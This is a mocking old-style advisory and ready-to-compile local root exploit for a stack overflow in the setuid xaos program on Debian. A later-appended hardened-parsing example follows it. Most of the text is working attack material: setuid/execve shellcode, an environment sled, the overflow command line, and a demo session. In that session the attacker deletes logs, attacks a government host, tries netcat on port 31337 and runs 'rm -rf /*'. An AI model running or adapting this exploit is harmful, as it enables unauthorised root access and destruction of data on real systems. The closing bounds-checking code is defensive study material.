bazarr!

Attachment: bazarr-episode-4.c

/* xaos <= 3.0-23 ? 0day local root xploit on debian 3.0 whoody        */
/* by: bazarr                                                           */
/* bazarr@ziplip.com                                                    */
/*      bazarr episode #4                                               *
                                                                        *
*hendy* i dont build nests for da winter, cause i dont have no time for building nests

dis is da advisory and xploit at da same time for a local root hole in debian 3.0.
if dave censor dis he out of his mind! dis my second local root xploit in a week!
when bugtraq be heading down south to county jail quick wid all da cross site scripting bugs and
advisories for hoolio's ftpd servers (WHO DA HELL IS HOOLIO). lets be real about dis,
advisories for non popular software are a dime a dozen. i da first young boy to come around
wid real advisories in many a months. so please gimme small break.
i release more advisories den combined times dvdfairy has DoS'd phrack.ru, dats alot!

--- You have been kicked from #openbsd by Dianora (I have been coding before you were even a glint in your fathers eye. go away)

dianora when i finish "da design and implementation of da 4.4bsd operating system" (A BOOK)
i be back to challenge you on bsd kernel, den you have no choice but to let me stay and give me +v in #openbsd.
thank you. (she kicked young 16 year old boy out of channel for xposing remote hole in default install!)

ok lets take a look at the vendor info for xaos:

DESCRIPTION
    XaoS is a portable real-time interactive fractal zoomer/morpher. UNIX version works under
    X11, SVGA and text terminals. If you don't knwo what fractal is or you want to know more
    about XaoS features you should see animated tutorial. Run XaoS and press 'H' twice. It is
    much more fun than reading of boring manual page :) and it supports foreign languages. You
    might also read xaos.info file for some advanced stuff (like how to write animations and
    tutorials manually, port or extend XaoS, algorithms used etc.)

first thing dat i spot is spelling mistake, please patch 'knwo' into 'no' asap.
so we know dat xaos is a program which you zoom around in when you get real stoned (seriously).

lets get to da local root hole in xaos.
lets take a look at my terminal session wid xaos:

c00l@debian:~/code/dump% ls -al xaos
ls: xaos: No such file or directory
c00l@debian:~/code/dump% #well it aint here so lemme get back to da irc
c00l@debian:~/code/dump% #wait a second! i got an idea
c00l@debian:~/code/dump% ls -al /usr/bin/xaos
-rwsr-xr-x    1 root     root       379324 Apr  3  2001 /usr/bin/xaos
c00l@debian:~/code/dump% #suid root?! dat mean if it xploited it will result in uid = 0
c00l@debian:~/code/dump% #what will i do now?

now what i be doin is dis, bear wid me here fellow security researchers (lcamtuf you able to keep up wid dis?)
lets keep going into dis adventure, lets check if you be vulnerable

c00l@debian:~/code/dump% #ok now we be checking if dis xaos is vulnerable to 0day bug which i have discovered
c00l@debian:~/code/dump% /usr/bin/xaos -language `perl -e 'print "A"x2049'`
^C
c00l@debian:~/code/dump% #ok im not vulnerable i guess
c00l@debian:~/code/dump% #w8 i have an idea!
c00l@debian:~/code/dump% /usr/bin/xaos -language `perl -e 'print "A"x20049'`
Segmentation fault
c00l@debian:~/code/dump% #aww crap i be vulnerable, what now?

after auditing for many a days and many a nights to find dis bug i am still weary from all of it.
so lemme try and keep on going through dis adventure wid xaos, lets try and xploit it dis time.

c00l@debian:~/code/dump% ./set   #dis put shellcode in environment with many a 0x90 around it
[c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x8096'` -display A
Segmentation fault
[c00l:dump]$ #its not xploitable i guess
[c00l:dump]$ #w8 i got an idea
[c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x8096'` -display AA
Segmentation fault
[c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x8096'` -display AAA
Segmentation fault
[c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x8096'` -display AAAA
sh-2.05a# id ; uname -a
uid=1001(c00l) gid=1001(c00l) euid=0(root) groups=1001(c00l)
Linux debian 2.4.18 #2 SMP Tue Nov 5 21:10:53 EST 2002 i686 unknown
sh-2.05a# # I DID IT
sh-2.05a# exit
exit
[c00l:dump]$ #be ethical and just run uname ; id and exit, thanks!

woa dis be going too fast for some security researchers, let me slow down and xplain dis.
xaos be doing something like dis wid its -language argument:

++++++++
char hoolio[4096];      //big as to not allow stack overflow
strcpy(hoolio,argv[i]); //secure
++++++++

but it is NOT secure, an attacker is able to overflow 'hoolio' wid his own data!
den he overwrite da saved return address on da stack with his own and den he execute a shell.

------------- ENDING
xaos is vulnerable to a stack buffer overflow which be yielding root privileges on debian 3.0 (w00dy)

------------- PATCH
see many a people dont understand dis issue, i am young highschool boy
doing many a bleeding edge freelance security work for free, it not my job to provide patch
and pamper you. but if you really dont want to get hacked with many a 0day xploits just dont go online
and dont make fun of caddis cuz he be xploiting your ftpd in record time to rm you (seriously man).

------------- VENDORS NOTIFIED
none

------------- VENDORS VULNERABLE
debian 3.0 & unstable on default install!!!
FreeBSD x.x ports!
OpenBSD x.x ports!
NetBSD x.x ports!!!
anyone who installed xaos!

------------- XPLOIT
as i promised, dis is da xploit!. if my code looks hoodly poodly its cuz
i have trouble programming after last nights crystal meth ride.

demonstration:

[pan@****.kr]$ cc bazarr-episode-4.c
[pan@****.kr]$ ./a.out aaaa
[*] bazarr :)
sh-2.05a# id
uid=1003(pan) gid=1003(pan) euid=0(root) groups=1003(pan)
sh-2.05a# rm -rf /var/log
sh-2.05a# cc b.c
sh-2.05a# ./a.out -t 39 -h ****.xxtax.gov.cn -s 90 -b
.... ..... .... .... .... ....
done.
sh-2.05a# nc ****.xxtax.gov.cn 31337
sh: nc: command not found
sh-2.05a# rm -rf /* & exit

just compile and run!!! so user friendly its not even funny!
the 'a's are stack padding for da xaos, try 1-4 'a's
woa hey i just made a fool of myself! i didnt need any stack padding there.
dis C-code is very complex, do not attempt to modify it.
it is very user friendly though for da following groups:
1. 22 year old php programming cs students
2. younger kids looking to hack boxes! (I LOVE DIS GROUP)
3. professional security researchers to make money off highschool boy by using dis xploit on der clients and charging dem for it
4. elite lurking blackhat laughing at my codez! (I CANT SAY I LIKE DIS GROUP ALL DAT MUCH)

AND NOW THE WORLDS FIRST 4 LINE ROOT XPLOIT PROGRAMMED IN C BY BAZARR */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* i386 Linux shellcode, 32 bytes: setuid(0) followed by execve("/bin//sh", ["/bin//sh"], NULL) */
char c[] =
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"                          /* xor eax,eax; xor ebx,ebx; mov al,23; int 0x80 */
    "\x31\xc0\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    "\x89\xe3\x52\x53\x89\xe1\xcd\x80";                         /* push "/bin//sh"; mov ebx,esp; ...; mov al,11; int 0x80 */

int main(int cc, char **a)
{
    char x[256];
    /* one byte of headroom so the terminating NUL lands inside the array
     * (the original wrote b[sizeof(b)], one byte past the end) */
    char b[72000 + 1];

    (void)cc;

    /* 0x99 is "cdq" on i386, a harmless one-byte instruction, so the whole
     * 72000-byte buffer acts as a sled the return address can land anywhere in */
    memset(b, 0x99, 72000);
    memcpy(b + 71968, c, strlen(c));   /* shellcode occupies the last 32 bytes of the sled */
    b[72000] = 0;
    setenv("C", b, 1);                 /* inherited by /usr/bin/xaos when system() runs it */

    if (!a[1]) {
        printf("[*] bazarr :(\n");
        exit(1);
    }

    /* -language: 8096 copies of the little-endian return address 0xbffefe45
     * (the session above used 0xbffffe45; the exact value depends on the
     *  target's stack layout).  -display: 1-4 bytes of padding from argv[1]
     * to shift the alignment of the overwrite. */
    snprintf(x, sizeof x,
             "/usr/bin/xaos -language `perl -e 'print \"\x45\xfe\xfe\xbf\"x8096'` -display %s",
             a[1]);
    printf("[*] bazarr :)\n");
    system(x);
    return 0;
}

/*
------------- ADVANCE WARNING
double free() bug in popular suid root application installed by default on debian 3.0 coming soon!
remote xploit for debian application coming soon!
and so many more i cannot even list dem all (SERIOUSLY).
16 year old boy release more bugs in few weeks den your whole crew does in da last 5 years!
i think most of you be a little bitter about dat and dats why some of you be anti bazarr.
your company should stick to hoolio's ftpd server.

------------- GREETS
sir hackalot - you cool man! you like the 2pac of hacking. what ever happened to you and PHAZE? it been awhile!

------------- BYE
bye bye guys i gotta go feed the dog and work on math homework. bye.

-bazarr
*/
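The advisory sketches the bug as an unbounded strcpy() of the -language argument into a 4096-byte stack buffer and proves it with two probe lengths (2049 bytes survives, 20049 bytes segfaults). The block below is an added example written for this page, not code from the advisory or from xaos: it places that sketched pattern next to a bounded replacement and replays the author's probes against the hardened version. The names hoolio, LANG_MAX, set_language_unsafe, set_language_safe, parse_language_option and probe are all illustrative; the real xaos option parser is not shown on the page, and the 4096 figure is taken from the advisory's sketch.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define LANG_MAX 4096   /* the fixed stack buffer size the advisory sketches for -language (assumed) */

/* The pattern the advisory attributes to xaos: unbounded strcpy() of an argv
 * element into a fixed-size stack buffer. Shown for comparison only and never
 * called below: with an argument of LANG_MAX bytes or more this is the stack
 * smash the exploit relies on (undefined behaviour). */
void set_language_unsafe(const char *arg)
{
    char hoolio[LANG_MAX];
    strcpy(hoolio, arg);   /* no length check: bytes past 4095 overwrite the frame and the saved return address */
    (void)hoolio;
}

/* Hardened form: measure with a bound first and refuse anything that does not
 * fit together with its NUL. Returns 0 on success, -1 with errno = E2BIG when
 * the argument is too long. The copy never exceeds outlen bytes. */
int set_language_safe(const char *arg, char *out, size_t outlen)
{
    size_t n = 0;
    while (n < outlen && arg[n] != '\0')   /* bounded length scan, stops at outlen */
        n++;
    if (n >= outlen) {                     /* n == outlen means no room for the NUL */
        errno = E2BIG;
        return -1;
    }
    memcpy(out, arg, n + 1);
    return 0;
}

/* Walk an argv-style array looking for "-language <value>" the way the
 * advisory describes xaos doing, but route the value through the bounded
 * copy. Returns 0 if the option is absent or accepted, -1 if the value is
 * missing or too long. */
int parse_language_option(int argc, char **argv, char *out, size_t outlen)
{
    for (int i = 1; i < argc; i++) {
        if (strcmp(argv[i], "-language") == 0) {
            if (i + 1 >= argc)
                return -1;
            return set_language_safe(argv[i + 1], out, outlen);
        }
    }
    return 0;
}

/* Reproduce the author's probe (n copies of 'A', as perl -e 'print "A"xn'
 * produces) against the hardened parser. Returns parse_language_option's result. */
int probe(size_t n)
{
    char *a = malloc(n + 1);
    if (!a)
        return -1;
    memset(a, 'A', n);
    a[n] = '\0';
    char *argv[] = { "xaos", "-language", a, NULL };   /* constructed argv, not a real invocation */
    char out[LANG_MAX];
    int rc = parse_language_option(3, argv, out, sizeof out);
    free(a);
    return rc;
}

int main(void)
{
    /* The two lengths from the session: 2049 fits the 4096-byte buffer, 20049 does not. */
    printf("2049 bytes : %s\n", probe(2049) == 0 ? "accepted" : "rejected (E2BIG)");
    printf("20049 bytes: %s\n", probe(20049) == 0 ? "accepted" : "rejected (E2BIG)");
    return 0;
}
```

The boundary worth checking is 4095 versus 4096 bytes: the bounded scan stops at outlen, so an argument that exactly fills the buffer with no room for the terminator is rejected rather than silently truncated, which is where a strncpy()-based fix usually goes wrong.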